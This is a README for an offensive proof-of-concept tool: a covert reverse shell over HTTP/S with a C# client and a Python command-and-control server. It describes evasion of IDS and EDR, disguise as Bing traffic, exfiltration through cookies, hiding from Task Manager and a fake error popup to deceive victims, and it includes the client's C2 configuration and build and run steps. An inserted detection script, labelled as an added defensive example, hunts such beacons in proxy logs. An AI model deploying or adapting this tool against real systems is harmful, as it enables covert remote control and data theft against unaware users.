[POC] Asynchronous reverse shell using the HTTP protocol.

onSec-fr/Http-Asynchronous-Reverse-Shell

✨ Introduction

In an age where advanced detection systems such as IDS, IPS, EDR, AV, and firewalls dominate corporate networks, evading them during offensive security assessments is a challenge. Most reverse shells leverage TCP tunnels (L4), which are now routinely analyzed and flagged.

This project presents an innovative solution: a completely asynchronous reverse shell over HTTP/S that blends into normal web traffic by mimicking legitimate user behavior.

Unlike traditional reverse shells, it only uses GET requests, appears as normal web queries, and can optionally run over HTTPS with a fake legitimate certificate, minimizing the chances of detection.


How it works?

  1. The client app is executed on the target machine.
  2. The client initiates the connection with the server.
  3. The server accepts the connection, then:
     • The client queries the server until it gets instructions.
     • The attacker provides instructions to the server.
     • When a command is defined, the client executes it and returns the result.
     • And so on, until the attacker decides to end the session.

Disclaimer

This tool is only intended to be a proof of concept demonstration tool for authorized security testing. Make sure you check with your local laws before running this tool.

🔧 Features

Today, as a PoC, the following features are implemented:

  • Stealthy GET-only communication.
  • Mimics Bing.com traffic.
  • Base64-encoded commands in HTML.
  • Exfiltration via HTTP cookies.
  • Optional HTTPS with spoofed cert.
  • Random delays and templates per request.
  • Single PowerShell process reuse to evade EDR.
  • Compatible with CMD & PowerShell commands.
  • Optional fake error message popup.
  • Hidden from Task Manager.
  • Optional admin-level execution.
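
For defenders, the network traits in this list (GET-only polling, Bing-style search URLs sent to a host that is not Bing, output returned in cookies, short randomized delays) can be hunted in web proxy logs. The sketch below is an added example and not part of this project; the record layout, the thresholds and the sample data are constructed assumptions.

```python
from collections import defaultdict
from statistics import median
from urllib.parse import urlsplit, parse_qs

BING_SUFFIXES = ("bing.com",)  # assumption: hosts that legitimately serve Bing searches

def is_bing_host(host):
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in BING_SUFFIXES)

def looks_like_bing_search(path):
    """True for paths shaped like the default Url in Config.cs: search?q=...&cvid=..."""
    parts = urlsplit(path)
    qs = parse_qs(parts.query, keep_blank_values=True)
    return parts.path.lstrip("/").startswith("search") and "q" in qs and "cvid" in qs

def find_beacons(records, min_hits=5, max_gap=30.0, big_cookie=512):
    """records: (epoch_seconds, client, method, host, path, cookie_bytes) tuples.
    Flags (client, host) pairs polling a non-Bing host with Bing-style search URLs."""
    groups = defaultdict(list)
    for ts, client, method, host, path, cookie_len in records:
        if method == "GET" and not is_bing_host(host) and looks_like_bing_search(path):
            groups[(client, host)].append((ts, cookie_len))
    findings = []
    for (client, host), hits in sorted(groups.items()):
        if len(hits) < max(min_hits, 2):
            continue
        hits.sort()
        gaps = [b[0] - a[0] for a, b in zip(hits, hits[1:])]
        if median(gaps) <= max_gap:  # illustrative threshold, tune per environment
            findings.append({
                "client": client, "host": host, "hits": len(hits),
                "median_gap": median(gaps),
                # Large request cookies fit output being returned in the Cookie header.
                "big_cookies": sum(1 for _, size in hits if size >= big_cookie),
            })
    return findings

# Constructed sample proxy records (not captured from the tool or any real network).
Q = "/search?q=search+something&qs=n&form=QBRE&cvid="
SAMPLE = (
    [(t, "10.0.0.5", "GET", "203.0.113.10", Q + str(i), size) for i, (t, size) in
     enumerate([(0, 40), (3, 40), (7, 1800), (10, 40), (14, 900), (18, 40)])]
    + [(t, "10.0.0.6", "GET", "www.bing.com", Q + "A1B2", 300) for t in (0, 4, 9, 13, 17)]
    + [(t, "10.0.0.7", "GET", "intranet.example", "/search?q=vpn", 60) for t in (5, 65)]
)

if __name__ == "__main__":
    print(find_beacons(SAMPLE))
```

When the traffic runs over HTTPS, the path and cookie size are only visible to a proxy that inspects TLS; without inspection, the same grouping can still be applied to destination host and request timing alone.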

🎥 Demonstration

Client side

Server side


⚙️ Configuration

Client (C#)

  1. Open HARS.sln in Visual Studio.
  2. Edit Config.cs to match your environment:

    class Config
    {
        /* Behavior */
        // Display a fake error msg at startup
        public static bool DisplayErrorMsg = true;
        // Title of fake error msg
        public static string ErrorMsgTitle = "This application could not be started.";
        // Description of fake error msg
        public static string ErrorMsgDesc = "Unhandled exception has occured in your application.\r\r Object {0} is not valid.";
        // Min delay between the client calls
        public static int MinDelay = 2;
        // Max delay between the client calls
        public static int MaxDelay = 5;
        // Fake uri requested - Warning : it must begin with "search" (or need a change on server side)
        public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid=";

        /* Listener */
        // Hostname/IP of C&C server
        public static string Server = "https://127.0.0.1";
        // Listening port of C&C server
        public static string Port = "443";
        // Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy
        public static bool AllowInsecureCertificate = true;
    }

Optional: Edit HARS.manifest to adjust privilege level.

requestedExecutionLevel can be set to asInvoker, highestAvailable, or requireAdministrator.

Project properties

Here you can customize the assembly information and an icon for the file.

Note : Target .NET framework version is set to 4.6 which is available by default in Windows 10.
For Windows 7, choose .NET 3.5 if you don't want to have to install missing features.

Build

Build the project from Visual Studio. The client should be generated in the Http Asynchronous Reverse Shell\HARS_Client\HARS\bin\Release folder.

Done!


Server (Python)

  1. Edit HARS_Server.py in HARS_Server/www/ to customize port or certificate path.

    PORT = 443
    CERT_FILE = '../server.pem'

  2. Run with:

    python HARS_Server.py

Notes

  • HTTP logs are located in Http Asynchronous Reverse Shell\HARS_Server\logs\
  • You can add your own templates (any HTML page) in Http Asynchronous Reverse Shell\HARS_Server\templates

🔗 References



@onSec-fr
